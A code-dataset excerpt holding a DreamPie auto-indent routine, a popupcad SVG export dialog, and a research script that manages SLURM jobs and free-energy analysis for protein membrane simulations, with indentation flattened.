sb.delete(sb.get_iter_at_line_offset(insert().get_line(),
len(line)),
insert())
# strip whitespace after insert point
it = insert(); it.forward_to_line_end()
after_insert = get_text(sb, insert(), it)
i = 0
while i < len(after_insert) and after_insert[i] in " \t":
i += 1
if i > 0:
it = insert(); it.forward_chars(i)
sb.delete(insert(), it)
# start new line
sb.insert_at_cursor('\n')
# scroll to see the beginning of the line
sourceview.scroll_mark_onscreen(sb.get_insert())
#self.scrolledwindow_sourceview.get_hadjustment().set_value(0)
        # adjust indentation for continuations and block open/close;
        # first we need to find the last stmt
y = pyparse.Parser(INDENT_WIDTH, INDENT_WIDTH)
y.set_str(get_text(sb, sb.get_start_iter(), insert()))
c = y.get_continuation_type()
if c != pyparse.C_NONE:
# The current stmt hasn't ended yet.
if c == pyparse.C_STRING_FIRST_LINE:
# after the first line of a string; do not indent at all
pass
elif c == pyparse.C_STRING_NEXT_LINES:
# inside a string which started before this line;
# just mimic the current indent
sb.insert_at_cursor(indent)
elif c == pyparse.C_BRACKET:
# line up with the first (if any) element of the
# last open bracket structure; else indent one
# level beyond the indent of the line with the
# last open bracket
sb.insert_at_cursor(' ' * y.compute_bracket_indent())
elif c == pyparse.C_BACKSLASH:
# if more than one line in this stmt already, just
# mimic the current indent; else if initial line
# has a start on an assignment stmt, indent to
# beyond leftmost =; else to beyond first chunk of
# non-whitespace on initial line
if y.get_num_lines_in_stmt() > 1:
sb.insert_at_cursor(indent)
else:
sb.insert_at_cursor(' ' * y.compute_backslash_indent())
else:
assert False, "bogus continuation type %r" % (c,)
return True
# This line starts a brand new stmt; indent relative to
# indentation of initial line of closest preceding
# interesting stmt.
indent = len(y.get_base_indent_string())
if y.is_block_opener():
indent = (indent // INDENT_WIDTH + 1) * INDENT_WIDTH
elif y.is_block_closer():
indent = max(((indent - 1) // INDENT_WIDTH) * INDENT_WIDTH, 0)
sb.insert_at_cursor(' ' * indent)
return True
finally:
sb.end_user_action()
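# Editor's sketch (added for illustration, not part of DreamPie): the block-opener/closer
# branch above reduces to integer arithmetic on INDENT_WIDTH. A minimal standalone
# illustration of just that last step (hypothetical helper, assuming a width of 4):
def _sketch_next_indent(indent, opens_block, closes_block, indent_width=4):
    """Mimic the indent adjustment made at the end of newline_and_indent()."""
    if opens_block:
        return (indent // indent_width + 1) * indent_width
    if closes_block:
        return max(((indent - 1) // indent_width) * indent_width, 0)
    return indent
# e.g. _sketch_next_indent(4, True, False) == 8 after a line like "if x:", and
#      _sketch_next_indent(8, False, True) == 4 after a line like "return y".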
|
uri-mog/dreampie
|
dreampielib/gui/newline_and_indent.py
|
Python
|
gpl-3.0
| 4,812
|
# -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes and CONTRIBUTORS
Email: danaukes<at>asu.edu.
Please see LICENSE for full license.
"""
import qt.QtCore as qc
import qt.QtGui as qg
import qt.QtSvg as qs
import popupcad
from math import pi, sin, cos
import numpy
import os
import sys
from popupcad.filetypes.validators import StrictDoubleValidator
class OutputSelection(qg.QDialog):
def __init__(self):
super(OutputSelection, self).__init__()
self.Inkscape = qg.QRadioButton('Inkscape')
self.CorelDraw = qg.QRadioButton('CorelDraw')
# self.Center = qg.QCheckBox('Center')
# self.rotation = qg.QLineEdit()
# self.rotation.setAlignment(qc.Qt.AlignRight)
# self.rotation.setText(str(0))
# self.rotation.setValidator(StrictDoubleValidator(popupcad.gui_negative_infinity, popupcad.gui_positive_infinity, popupcad.gui_default_decimals, self.rotation))
# self.rotation = qg.QSpinBox()
button1 = qg.QPushButton('Ok')
button2 = qg.QPushButton('Cancel')
self.dirbox = qg.QLineEdit()
self.dirbox.setText(popupcad.exportdir)
self.dirbutton = qg.QPushButton('...')
layout0 = qg.QHBoxLayout()
layout0.addWidget(self.dirbox)
layout0.addWidget(self.dirbutton)
layout1 = qg.QHBoxLayout()
layout1.addWidget(self.Inkscape)
layout1.addWidget(self.CorelDraw)
layout2 = qg.QHBoxLayout()
layout2.addWidget(button1)
layout2.addWidget(button2)
# layout4 = qg.QHBoxLayout()
# layout4.addWidget(qg.QLabel('Rotation'))
# layout4.addWidget(self.rotation)
layout3 = qg.QVBoxLayout()
layout3.addLayout(layout0)
layout3.addLayout(layout1)
# layout3.addWidget(self.Center)
# layout3.addLayout(layout4)
layout3.addLayout(layout2)
self.dirbutton.clicked.connect(self.selectExport)
button1.clicked.connect(self.accept)
button2.clicked.connect(self.reject)
self.Inkscape.setChecked(True)
self.setLayout(layout3)
def acceptdata(self):
if self.Inkscape.isChecked():
return popupcad.inkscape_mm_conversion, self.dirbox.text()
elif self.CorelDraw.isChecked():
return popupcad.coreldraw_mm_conversion, self.dirbox.text()
else:
raise Exception
def selectExport(self):
directorypath = qg.QFileDialog.getExistingDirectory(self,"Select Directory",self.dirbox.text())
if directorypath!='':
directorypath = os.path.normpath(directorypath)
self.dirbox.setText(directorypath)
class SVGOutputSupport(object):
def screenShot(self):
win = OutputSelection()
accepted = win.exec_()
if accepted:
time = popupcad.basic_functions.return_formatted_time()
self.renderprocess('2D_screenshot_' + time +'.svg',*win.acceptdata())
def renderprocess(self,basename,scaling,exportdir):
tempmodes = []
for item in self.items():
try:
tempmodes.append(item.mode)
except AttributeError:
tempmodes.append(None)
selected = self.selectedItems()
tempbrush = self.backgroundBrush()
# prerender
self.setBackgroundBrush(qg.QBrush())
for item in self.items():
try:
item.updatemode(item.modes.mode_render)
except AttributeError:
pass
pen = item.pen()
pen.setWidth(pen.width() / scaling)
item.setPen(pen)
item.setSelected(False)
filename = os.path.normpath(os.path.join(exportdir, basename))
self.setSceneRect(self.itemsBoundingRect())
generator = qs.QSvgGenerator()
generator.setFileName(filename)
generator.setSize(qc.QSize(self.width(), self.height()))
generator.setResolution(90.0 / scaling)
generator.setTitle('SVG Generator Example Drawing')
generator.setDescription('An SVG drawing created by the SVG Generator')
painter = qg.QPainter()
painter.begin(generator)
painter.setWorldMatrixEnabled(True)
t = qg.QTransform()
if popupcad.flip_y:
t.scale(1, -1)
s = scaling
t.scale(s, s)
t.translate(0, -self.height())
# if center:
# v1 = numpy.array([-self.width() / 2, -self.height() / 2])
# theta = -rotation * pi / 180
# R = numpy.array(
# [[cos(theta), sin(theta)], [-sin(theta), cos(theta)]])
# v2 = R.dot(v1)
# t.translate(*v2)
# t.rotate(rotation)
painter.setWorldTransform(t)
self.render(painter)
painter.end()
for item in selected:
item.setSelected(True)
for item, mode in zip(self.items(), tempmodes):
pen = item.pen()
pen.setWidth(pen.width() * scaling)
item.setPen(pen)
try:
item.updatemode(mode)
except AttributeError:
pass
self.setBackgroundBrush(tempbrush)
self.update()
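# Editor's note (descriptive, not from the original source): renderprocess() above works by
# temporarily switching every item to its render mode, dividing pen widths by the scaling
# factor so they come out at the intended size at the generator resolution of 90.0 / scaling,
# rendering the scene into the QSvgGenerator, and then restoring the saved modes, pen widths,
# selection and background brush.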
if __name__ == '__main__':
app = qg.QApplication(sys.argv)
win = OutputSelection()
win.exec_()
sys.exit(app.exec_())
|
danaukes/popupcad
|
popupcad/graphics2d/svg_support.py
|
Python
|
mit
| 5,326
|
#!/usr/bin/env python3
import os
import sys
import random
import time
from random import seed, randint
import argparse
import platform
from datetime import datetime
import imp
import glob
from time import sleep
import fileinput
import numpy as np
from small_script.variable_test import variable_test
import subprocess
from small_script.myFunctions import compute_theta_for_each_helix
from small_script.myFunctions import *
from small_script.myFunctions import make_metadata
# Useful commands
# os.system("awk '{print $NF}' all_wham.dat > e_total")
# tr " " "\n"
# sed 1d
# sort -u -k 3
# sed -e 's/+T//'
# import re
# numbers = re.compile(r'(\d+)')
# def numericalSort(value):
# parts = numbers.split(value)
# parts[1::2] = map(int, parts[1::2])
# return parts
# mypath = os.environ["PATH"]
# os.environ["PATH"] = "/home/wl45/python/bin:/home/wl45/opt:" + mypath
# my_env = os.environ.copy()
parser = argparse.ArgumentParser(description="This is my playground for the current project")
parser.add_argument("-r", "--run", help="test mode",
action="store_true")
parser.add_argument("-s", "--see", help="test mode",
action="store_true")
# parser.add_argument("-d", "--debug", action="store_true", default=False)
parser.add_argument("-m", "--mode", type=int, default=0)
parser.add_argument("-d", "--day", type=str, default="someday")
parser.add_argument("-t", "--test", action="store_true", default=False)
args = parser.parse_args()
if args.test:
do = print
else:
do = os.system
cd = os.chdir
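# Editor's note: with -t/--test the script runs in dry-run mode, i.e. `do` only prints each
# shell command instead of executing it; `cd` is simply a short alias for os.chdir.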
base_slurm = '''\
#!/bin/bash
#SBATCH --job-name=CTBP_WL
#SBATCH --account=ctbp-common
#SBATCH --partition=ctbp-common
#SBATCH --ntasks=1
#SBATCH --threads-per-core=1
#SBATCH --mem-per-cpu=1G
#SBATCH --time=01:00:00
#SBATCH --mail-user=luwei0917@gmail.com
#SBATCH --mail-type=FAIL
echo "My job ran on:"
echo $SLURM_NODELIST
srun {}\n'''
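# Editor's note (illustrative usage, hypothetical command): base_slurm is meant to be filled
# with the command to run, e.g.
#     with open("run_2.slurm", "w") as f:
#         f.write(base_slurm.format("python3 ~/opt/some_analysis.py"))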
def replace(TARGET, FROM, TO):
do("sed -i.bak 's/{}/{}/g' {}".format(FROM,TO,TARGET))
def getFromTerminal(CMD):
return subprocess.Popen(CMD,stdout=subprocess.PIPE,shell=True).communicate()[0].decode()
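# Editor's note (illustrative): getFromTerminal runs a shell command and returns its stdout
# as text, e.g. getFromTerminal("echo hello") == "hello\n".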
def continueRunConvertion(n=12, rerun=0):
rerun_plus_one = rerun + 1
do(f"cp 2xov_0.in 2xov_{rerun_plus_one}.in")
fileName = f"2xov_{rerun_plus_one}.in"
replace(fileName, "variable r world "+ " ".join(str(i) for i in list(range(n))), "")
replace(fileName, "# read_restart restart.25000000", "variable r world "+ " ".join(str(i) for i in list(range(n))))
initial_steps = 20000000 * rerun_plus_one
replace(fileName, "read_restart restart.extended", f"read_restart restart.$r.{initial_steps}")
replace(fileName, "read_restart restart.native_topology", f"read_restart restart.$r.{initial_steps}")
    replace(fileName, r"0\/", rf"{rerun_plus_one}\/")
cmd = 'tail -n 1 log.lammps | cut -d" " -f2-'
line = getFromTerminal(cmd).rstrip()
replace(fileName, "reset_timestep 0", "variable w world " + line)
replace(fileName, "fix xbias all colvars colvars.x output x", "fix xbias all colvars colvars.x output x.$r")
cmd = f'grep "temper" 2xov_{rerun_plus_one}.in'
line = getFromTerminal(cmd).rstrip()
replace(fileName, line, line + " $w")
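# Editor's note (descriptive, derived from the code above): for rerun=0 the function copies
# 2xov_0.in to 2xov_1.in and rewrites it so that each replica $r restarts from
# restart.$r.20000000, writes into the 1/ output directory, keeps a per-replica colvars
# output file (x.$r), and resumes tempering from the temperatures recorded on the last line
# of log.lammps.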
def scancel_jobs_in_folder(folder):
cd(folder)
cmd = "find -name 'slurm-*' | rev | awk -F'[-.]' '{print $2}' | rev"
lines = getFromTerminal(cmd).splitlines()
for line in lines:
print(line)
do("scancel " + line)
cd("..")
quick_slurm = '''#!/bin/bash
#SBATCH --job-name=CTBP_WL
#SBATCH --account=ctbp-common
#SBATCH --partition=ctbp-common
#SBATCH --ntasks=1
#SBATCH --mem-per-cpu=1G
#SBATCH --time=00:30:00
#SBATCH --mail-user=luwei0917@gmail.com
#SBATCH --mail-type=FAIL
echo "My job ran on:"
echo $SLURM_NODELIST
srun python3 ~/opt/davinci_gg.py -d mar13 -m 5
'''
localQ_slurm = '''#!/bin/bash
#SBATCH --job-name=CTBP_WL
#SBATCH --account=ctbp-common
#SBATCH --partition=ctbp-common
#SBATCH --ntasks=1
#SBATCH --mem-per-cpu=1G
#SBATCH --time=00:30:00
#SBATCH --mail-user=luwei0917@gmail.com
#SBATCH --mail-type=FAIL
echo "My job ran on:"
echo $SLURM_NODELIST
srun python3 ~/opt/davinci_gg.py -d mar13 -m 3
'''
if args.day == "mar13":
if args.mode == 7:
bias = "dis"
simulation_list = glob.glob(f"{bias}_*")
# simulation_list = ['dis_86.0', 'dis_84.0', 'dis_76.0', 'dis_72.0', 'dis_54.0', 'dis_70.0', 'dis_50.0', 'dis_56.0', 'dis_80.0', 'dis_30.0', 'dis_88.0', 'dis_44.0', 'dis_46.0', 'dis_96.0', 'dis_38.0']
print(simulation_list)
for dis in simulation_list:
print(dis)
cd(dis)
i = 1
i_plus_one = i +1
# do(f"mkdir -p log{i}")
# do(f"mv log.* log{i}/")
# do(f"cp log{i}/log.lammps .")
# do(f"cp x.* log{i}/")
continueRunConvertion(n=12, rerun=i)
do(f"mkdir {i_plus_one}")
do(f"sed 's/2xov_{i}/2xov_{i_plus_one}/g' run_{i}.slurm > run_{i_plus_one}.slurm")
do(f"sbatch run_{i_plus_one}.slurm")
cd("..")
if args.mode == 6:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10", "1d_z":"12", "2d_z_qw":"13", "2d_z_dis":"14"}
data_folder = "all_data_folder/"
freeEnergy_folder = f"third_combined_expectedDistance_freeEnergy/"
print(freeEnergy_folder)
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
# folder_list = ["rerun_1_08_Mar_154259"]
# folder_list = [f"first_rerun_{sample_range_mode}_12_Mar_151630" for i in range(4,6)]
# folder_list = [f"second_rerun_{i}_12_Mar_211030" for i in range(2,4)]
folder_list = [f"third_rerun_{i}_14_Mar_015209" for i in range(2,4)]
# submode_list = ["_no_energy"]
# submode_list = ["", "only_500"]
# submode_list = ["350", "400", "450", "500", "550"]
temp_dic = {"_350-550":["350", "400", "450", "500", "550"]}
for temp_mode, temp_list in temp_dic.items():
move_data4(data_folder, freeEnergy_folder, folder_list, sample_range_mode=-2, sub_mode_name=temp_mode, average_z=2, chosen_mode=0)
cd(freeEnergy_folder)
for temp_mode, temp_list in temp_dic.items():
cd(temp_mode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
make_metadata_3(temps_list=temp_list,k=0.02, i=-2)
nsample = len(folder_list)*2500
do(f"python3 ~/opt/pulling_analysis_2.py -m {mode} --commons 0 --nsample {nsample} --submode 2")
cd("..")
cd("..")
cd("..")
if args.mode ==5:
for i in range(12):
compute_average_z_2(f"dump.lammpstrj.{i}", f"z_complete_{i}.dat")
if args.mode == 4:
print("compute localQ")
# print(native_contacts_table)
# cd("simulation")
bias = "dis"
simulation_list = glob.glob(f"{bias}_*")
# sim_list = ["0"]
sim_list = ["0", "1"]
for sim in sim_list:
for folder in simulation_list:
cd(folder)
cd(sim)
print(folder)
with open("localQ.slurm", "w") as f:
f.write(localQ_slurm)
# f.write(localQ_slurm.replace("ctbp-common", "commons"))
do("sbatch localQ.slurm")
cd("../..")
if args.mode == 3:
native_contacts_table = compute_localQ_init()
for i in range(12):
compute_localQ(native_contacts_table, pre=".", ii=i)
if args.mode == 2:
bias = "dis"
simulation_list = glob.glob(f"{bias}_*")
sim_list = ["0", "1"]
for sim in sim_list:
for folder in simulation_list:
cd(folder)
cd(sim)
print(folder)
with open("computeZ.slurm", "w") as f:
f.write(quick_slurm)
# f.write(quick_slurm.replace("ctbp-common", "commons"))
do("sbatch computeZ.slurm")
cd("../..")
if args.mode == 1:
pre = "/scratch/wl45/"
data_folder = "/scratch/wl45/all_data_folder/"
folder_list = ["rg_0.1_lipid_1.0_mem_1"]
# folder_list = ["23oct/memb_3_rg_0.1_lipid_1_extended"]
# folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended",
# "rgWidth_memb_3_rg_0.1_lipid_1_topology",
# "expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
process_complete_temper_data_3(pre, data_folder, folder_list, rerun=1, average_z=True, localQ=True, label="third_")
if args.day == "mar09":
if args.mode == 1:
bias = "dis"
simulation_list = glob.glob(f"{bias}_*")
# simulation_list = ['dis_86.0', 'dis_84.0', 'dis_76.0', 'dis_72.0', 'dis_54.0', 'dis_70.0', 'dis_50.0', 'dis_56.0', 'dis_80.0', 'dis_30.0', 'dis_88.0', 'dis_44.0', 'dis_46.0', 'dis_96.0', 'dis_38.0']
print(simulation_list)
for dis in simulation_list:
print(dis)
cd(dis)
i = 0
i_plus_one = i +1
do(f"mkdir -p log{i}")
do(f"mv log.* log{i}/")
do(f"cp log{i}/log.lammps .")
do(f"cp x.* log{i}/")
continueRunConvertion(n=12, rerun=i)
do(f"mkdir {i_plus_one}")
do(f"sed 's/2xov_{i}/2xov_{i_plus_one}/g' run_{i}.slurm > run_{i_plus_one}.slurm")
do(f"sbatch run_{i_plus_one}.slurm")
cd("..")
if args.day == "mar05":
if args.mode == 1:
print("cp data files.")
protein_list = ["T0766", "1mba", "T0784", "T0792", "T0803", "T0815", "T0833", "T0251"]
for protein in protein_list:
# cmd = f"cp -r /work/cms16/xl23/shared/IAAWSEM/MC_DATA_28Feb2018/{protein}/AWSEM_energy/AWSEM_energy.log {protein}_awsem.log"
cmd = f"cp /work/cms16/xl23/shared/IAAWSEM/AWSEM_HO_Results/protein_pool/02282018/{protein.lower()}/iter/post-processing/noCST/qw/pca/lowTstructure/Qw.short.out {protein}_qw.txt"
do(cmd)
cmd = f"cp /work/cms16/xl23/shared/IAAWSEM/AWSEM_HO_Results/protein_pool/02282018/{protein.lower()}/iter/post-processing/noCST/qw/pca/lowTstructure/rmsd-angstrom.short.xvg {protein}_rmsd.txt"
do(cmd)
if args.day == "mar03":
if args.mode == 1:
print("cp data files.")
protein_list = ["T0766", "1mba", "T0784", "T0792", "T0803", "T0815", "T0833", "T0251"]
for protein in protein_list:
# cmd = f"cp -r /work/cms16/xl23/shared/IAAWSEM/MC_DATA_28Feb2018/{protein}/AWSEM_energy/AWSEM_energy.log {protein}_awsem.log"
cmd = f"cp /work/cms16/xl23/shared/IAAWSEM/AWSEM_HO_Results/protein_pool/02282018/{protein.lower()}/iter/post-processing/noCST/qw/pca/lowTstructure/rwplusScore.short.txt {protein}_rw.txt"
do(cmd)
if args.mode == 2:
a = pd.read_csv("/scratch/wl45/structure_selector_mar03/old_best_by_prediction.csv")
a = a.assign(index=a.Step-1)
for name, data in a.groupby("Name"):
if name == "T0251":
nn = "T251"
else:
nn = name
print(name)
do(f"mkdir {name}")
# print(data["index"])
for i in data["index"]:
do(f"cp /work/cms16/xl23/shared/IAAWSEM/MC_DATA_24Aug/{nn.upper()}/lowTstructure/lowTstructure{i}.pdb {name}/chosen_{i}.pdb")
if args.mode == 3:
a = pd.read_csv("/scratch/wl45/structure_selector_mar03/best_by_prediction_correction.csv")
# a = a.assign(index=a.Step-1)
for name, data in a.groupby("Name"):
if name == "T0251":
nn = "T251"
else:
nn = name
print(name)
do(f"mkdir {name}")
# print(data["index"])
for i in data["index"]:
do(f"cp /work/cms16/xl23/shared/IAAWSEM/MC_DATA_28Feb2018/{nn}/lowTstructure/lowTstructure{i}.pdb {name}/pca_chosen_{i}.pdb")
if args.mode == 4:
a = pd.read_csv("/scratch/wl45/structure_selector_mar03/best_by_prediction_based_on_new.csv")
# a = a.assign(index=a.Step-1)
for name, data in a.groupby("Name"):
if name == "1MBA":
nn = "1mba"
else:
nn = name
print(name)
do(f"mkdir {name}_new")
# print(data["index"])
for i in data["index"]:
do(f"cp /work/cms16/xl23/shared/IAAWSEM/MC_DATA_28Feb2018/{nn}/lowTstructure/lowTstructure{i}.pdb {name}_new/pca_chosen_{i}.pdb")
if args.day == "mar01":
if args.mode == 1:
cd("simulation")
bias = "dis"
simulation_list = glob.glob(f"{bias}_*")
sim_list = ["0", "1"]
for sim in sim_list:
for folder in simulation_list:
cd(folder)
cd(sim)
print(folder)
with open("computeZ.slurm", "w") as f:
f.write(quick_slurm)
# f.write(quick_slurm.replace("ctbp-common", "commons"))
do("sbatch computeZ.slurm")
cd("../..")
if args.mode ==2:
for i in range(12):
compute_average_z(f"dump.lammpstrj.{i}", f"z_{i}.dat")
if args.mode == 3:
pre = "/scratch/wl45/"
data_folder = "/scratch/wl45//all_data_folder/"
folder_list = ["rg_0.2_lipid_1.0_mem_1"]
# folder_list = ["23oct/memb_3_rg_0.1_lipid_1_extended"]
# folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended",
# "rgWidth_memb_3_rg_0.1_lipid_1_topology",
# "expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
process_complete_temper_data(pre, data_folder, folder_list, rerun=1, average_z=True)
if args.mode == 4:
simulation_list = glob.glob("dis_*")
print(simulation_list)
for dis in simulation_list:
print(dis)
cd(dis)
i = 1
i_plus_one = i +1
do(f"mkdir -p log{i}")
do(f"mv log.* log{i}/")
do(f"cp log{i}/log.lammps .")
do(f"cp x.* log{i}/")
# continueRunConvertion(n=12, rerun=i)
# do(f"mkdir {i_plus_one}")
# run_slurm = base_run_slurm.format(i_plus_one)
# with open(f"run_{i_plus_one}.slurm", "w") as r:
# r.write(run_slurm)
# do(f"sbatch run_{i_plus_one}.slurm")
# do(f"sed 's/2xov_{i}/2xov_{i_plus_one}/g' run_{i}.slurm > run_{i_plus_one}.slurm")
# do(f"sbatch run_{i_plus_one}.slurm")
cd("..")
if args.mode == 5:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10", "1d_z":"12", "2d_z_qw":"13", "2d_z_dis":"14"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"freeEnergy_rg_0.1_lipid_1.0_mem_1_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["rg_0.2_lipid_1.0_mem_1"]
# submode_list = ["_no_energy"]
# submode_list = ["", "only_500"]
# submode_list = ["350", "400", "450", "500", "550"]
temp_dic = {"_350-550":["350", "400", "450", "500", "550"]}
for temp_mode, temp_list in temp_dic.items():
for folder in folder_list:
move_data2(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=temp_mode, average_z=True)
cd(freeEnergy_folder)
for temp_mode, temp_list in temp_dic.items():
for folder in folder_list:
cd(folder+temp_mode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
make_metadata(temps_list=temp_list,k=0.02)
do("pulling_analysis.py -m {} --commons 0 --nsample 2500 --submode 5".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "dec03":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"dec02_no_side_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["no_side_contraint_memb_3_rg_0.4_lipid_0.6_extended"]
# submode_list = ["_no_energy"]
# submode_list = ["", "only_500"]
# submode_list = ["350", "400", "450", "500", "550"]
temp_dic = {"_350-550":["350", "400", "450", "500", "550"]}
for temp_mode, temp_list in temp_dic.items():
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=temp_mode)
cd(freeEnergy_folder)
for temp_mode, temp_list in temp_dic.items():
for folder in folder_list:
cd(folder+temp_mode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
make_metadata(temps_list=temp_list,k=0.02)
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "dec02":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"dec02_no_side_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["no_side_contraint_memb_3_rg_0.4_lipid_0.6_extended"]
# submode_list = ["_no_energy"]
# submode_list = ["", "only_500"]
submode_list = ["350", "400", "450", "500", "550"]
for submode in submode_list:
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=submode)
cd(freeEnergy_folder)
for submode in submode_list:
for folder in folder_list:
cd(folder+submode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
make_metadata(temps_list=[submode],k=0.02)
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "nov29":
if args.mode == 3:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"nov29_no_side_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["no_side_contraint_memb_3_rg_0.4_lipid_0.6_extended"]
# submode_list = ["_no_energy"]
submode_list = ["", "only_500"]
for submode in submode_list:
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=submode)
cd(freeEnergy_folder)
for submode in submode_list:
for folder in folder_list:
cd(folder+submode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "only_500":
make_metadata(temps_list=[500],k=0.02)
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "_no_energy":
do("make_metadata.py -m 18 -k 0.05")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 21")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.mode == 2:
make_metadata(temps_list=[400])
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"15", "1d_dis":"14", "1d_qw":"13"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"nov29_q_bias_temper_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["q_bias_temper_new"]
# submode_list = ["_no_energy"]
submode_list = [""]
for submode in submode_list:
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=submode, bias="qbias")
cd(freeEnergy_folder)
for submode in submode_list:
for folder in folder_list:
cd(folder+submode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "_no_energy":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "":
do("make_metadata.py -m 18 -k 1000")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 21")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "nov28":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(1):
freeEnergy_folder = f"nov28_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["bias_0.05_memb_3_rg_0.4_lipid_0.6_extended"]
# submode_list = ["_no_energy"]
submode_list = [""]
for submode in submode_list:
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=submode)
cd(freeEnergy_folder)
for submode in submode_list:
for folder in folder_list:
cd(folder+submode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "_no_energy":
do("make_metadata.py -m 18 -k 0.05")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "":
do("make_metadata.py -m 18 -k 0.05")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 21")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "nov27":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"15", "1d_dis":"14", "1d_qw":"13"}
data_folder = "all_data_folder/"
for sample_range_mode in range(1):
freeEnergy_folder = f"q_bias_temper_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["q_bias_temper_new"]
# submode_list = ["_no_energy"]
submode_list = [""]
for submode in submode_list:
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=submode, bias="qbias")
cd(freeEnergy_folder)
for submode in submode_list:
for folder in folder_list:
cd(folder+submode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "_no_energy":
